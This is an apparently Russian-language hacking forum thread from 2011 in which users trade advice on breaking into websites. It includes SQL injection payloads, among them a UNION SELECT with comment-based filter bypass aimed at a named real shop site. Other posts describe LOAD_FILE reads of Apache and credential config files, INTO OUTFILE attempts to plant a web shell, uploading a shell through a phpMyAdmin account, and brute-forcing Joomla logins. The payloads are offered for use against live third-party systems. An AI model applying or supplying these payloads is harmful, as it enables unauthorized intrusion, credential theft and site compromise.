Ваши вопросы по уязвимостям.

26.11.2011, 15:39

boortyhuhtyu

Постоянный

Регистрация: 02.02.2011

Сообщений: 727

С нами: 8039126

Репутация: -6

Цитата:

Сообщение от d1v

тогда иди на завод. и вообще ты разделом ошибся. не пиши сюда больше.

иди на завод сам еп.

𝕏 Twitter Reddit Telegram Копировать ссылку

26.11.2011, 20:15

Aniweste

Новичок

Регистрация: 28.05.2010

Сообщений: 0

С нами: 8397749

Репутация: 0

Здравствуйте ещё раз. Интересует следующий вопрос:

Имеется доступ к phpmyadmin.

Права пользователя: ALL PRIVILEGES

Версия phpmyadmin: 3.3.4

Sql-injection на сайте не приводит к раскрытию путей.

Какие есть способы залить шелл?

Спасибо за ответ.

26.11.2011, 20:23

PRosTo_LEva

Новичок

Регистрация: 18.04.2007

Сообщений: 1

С нами: 10035004

Репутация: 0

Предположение - если временно сменить название базы данных - скрипт при попытке подключится выдаст ошибку с раскрытием путей.

26.11.2011, 21:32

Boolean

Участник форума

Регистрация: 05.09.2010

Сообщений: 147

С нами: 8255126

Репутация: 78

Цитата:

Сообщение от Aniweste

Здравствуйте ещё раз. Интересует следующий вопрос:
Имеется доступ к phpmyadmin.
Права пользователя: ALL PRIVILEGES
Версия phpmyadmin: 3.3.4
Sql-injection на сайте не приводит к раскрытию путей.
Какие есть способы залить шелл?
Спасибо за ответ.

LOAD_FILE('/путь/до/конфиг/апача');

Список можно посмотреть тут: /thread49775.html

26.11.2011, 23:45

Aniweste

Новичок

Регистрация: 28.05.2010

Сообщений: 0

С нами: 8397749

Репутация: 0

Цитата:

Сообщение от Boolean

LOAD_FILE('/путь/до/конфиг/апача');
Список можно посмотреть тут: /thread49775.html

Делаю sql-запрос - получаю ответ

Код:

#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LOAD_FILE('/etc/apache/conf/httpd.conf')' at line 1

Что именно я делаю не правильно?

27.11.2011, 00:46

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

С нами: 9642449

Репутация: 606

Цитата:

Сообщение от Aniweste

Делаю sql-запрос - получаю ответ

Код:

#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LOAD_FILE('/etc/apache/conf/httpd.conf')' at line 1

Что именно я делаю не правильно?

select LOAD_FILE('/etc/apache/conf/httpd.conf')

27.11.2011, 01:57

nakurukataоm

Новичок

Регистрация: 05.09.2010

Сообщений: 25

С нами: 8255126

Репутация: 0

Здравствуйте, у меня есть вопрос по nmap:

Распознаёт ли nmap кириллицу? Хочу использовать функцию брута joomla на форуме, но все ники кириллицей и пароли кириллицей сразу отправляются в невалид. как с этим можно побороться?

27.11.2011, 11:19

lion-art

Познающий

Регистрация: 30.10.2011

Сообщений: 37

С нами: 7650326

Репутация: 1

тем кто знает хорошо тему заливки файлов.

Цитата:

Сообщение от lion-art

Как всегда начну с фразы: "Уважаемые знатоки!"
Есть сайт:
1)file_priv=y
2)mq=off
3) есть /test.php
3) Доступ 4х администраторов в админку есть, доступ в админку www.site.ru/cms) - так он не пускает но если через www.site.ru/index.php/cms тогда пускает но не выполняются скрипты.
4) прочитан config.ini есть пароль root к базе. Но путь до самой базы не известен.
Теперь самое интересное:
config.ini прочитан так:
index/***/id/*21'+or+1+group+by+concat(mid(load_file(0xздес ьхеш),50,163),floor(rand(0)*2))+having+min(0)+ or+1+--+
запрос на запись делаем так: /image/*****/id/*53+and+(select+'+into+outfile+')+!=1
результат - ошибка но через пару часов при
/image/*****/id/*53 без инъекта появляется следущее:
яШяаJFIFHHяб4ExifII*bj( 1r2Ћi‡¤шЂь 'Ђь 'Adobe Photoshop CS2 Windows2011:07:05 16:16:46†’Ъ яя Ж zLEAD Technologies Inc. V1.01FN(VЦHHяШ� �аJFIFHHянAdobe_CMяоAdobedЂяЫ„ яАc "яЭ яД? 3!1AQa"qЃ2‘Ў
и т.д...
ВНИМАНИЕ ВОПРОС!
На сколько высока вероятность то что into outfile не получится (доходчиво: шелл не зальется?)
P.S. возможно не правильный запрос но если запрос сделать так
/image/*****/id/*53+and+'select+'+into+outfile+'+!=1'
то ошибка такова:
Invalid query: File ' !=1' already exists
Спасибо за внимание надеюсь на коментарии, может у кого-то похожая ситуация была.

Если что пишите в ПМ все остальное не могу выложить в паблик

27.11.2011, 11:34

lightangel

Познающий

Регистрация: 07.11.2011

Сообщений: 91

С нами: 7638806

Репутация: -6

http://www.shopoldcoloradocity.com/content.php?id=-97+order+14-- (FALSE)

http://www.shopoldcoloradocity.com/content.php?id=-97 1=1 (Blind working)

http://www.shopoldcoloradocity.com/content.php?id=-97 and substring(@@version,1,1)=4

Unknown column '20and' in 'where clause

Even

http://www.shopoldcoloradocity.com/content.php?id=-97 and substring(@@version,1,1)=5

Any solution?

#10

27.11.2011, 11:45

tabletkO

Познающий

Регистрация: 03.11.2011

Сообщений: 83

С нами: 7644566

Репутация: 11

lightangel,

http://www.shopoldcoloradocity.com/content.php?id=-97/**/union/**/select/**/1,version(),3,4,user(),6,7,8,9,10,11,12--

Site filter symbol "+". But you can use /**/

Создать сделку

Мои сделки

Сделка

ESCROW ADMIN PANEL